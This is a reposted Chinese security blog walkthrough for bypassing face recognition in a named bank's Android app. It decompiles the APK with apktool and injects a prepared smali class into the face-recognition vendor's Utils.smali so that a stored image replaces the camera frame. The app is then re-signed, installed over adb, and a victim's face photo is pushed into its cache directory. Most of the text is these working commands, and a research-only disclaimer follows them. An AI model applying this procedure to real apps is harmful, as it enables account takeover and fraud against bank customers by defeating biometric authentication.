人脸识别绕过过程

admin
admin
admin
138109
文章
113
评论
2022年7月11日23:36:40评论303 views字数 821阅读2分44秒阅读模式

1.反编译xxxxAPP

apktool -r d app-pro-release.apk -o out/




2.需改smali文件
2.1 放入预先准备好的StackPrint.smali文件


人脸识别绕过过程



2.2 修改cn/cloudwalk/Utils.smali文件
在Utils.smali文件中,调用StackPrint.smali文件中的getDiskBitmap方法




    

  • 



invoke-static {}, Lcom/example/test/myapplication/StackPrint;->getDiskBitmap()Landroid/graphics/Bitmap;move-result-object p0




人脸识别绕过过程



2.3 重新编译xx银行APP


apktool b out/ -o test13.apk




2.4 重新签名APP


java -jar apksigner.jar sign --ks debug-android-key.jks --ks-key-alias key --ks-pass pass:android --key-pass pass:android --out test13_s.apk test13.apk 




3.安装重签名后的APP


adb install -r test13_s.apk




4.人脸识别绕过
4.1 把正确的人脸图片放到 /data/data/com.csii.jsh.ui/cache路径下


adb push face.jpeg /data/local/tmp/cp /data/local/tmp/face.jpeg /data/data/com.csii.jsh.ui/cache/face.jpgchown -R u0_a274:u0_a274 /data/data/com.csii.jsh.ui/cache/face.jpg




4.2 启动APP,登录后,进行人脸识别
账号:1823xxxxx29   
密码:q19xxxx


4.3 人脸识别绕过


人脸识别绕过过程





原文始发于微信公众号(PwnWiki):人脸识别绕过过程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月11日23:36:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   人脸识别绕过过程https://cn-sec.com/archives/1171298.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息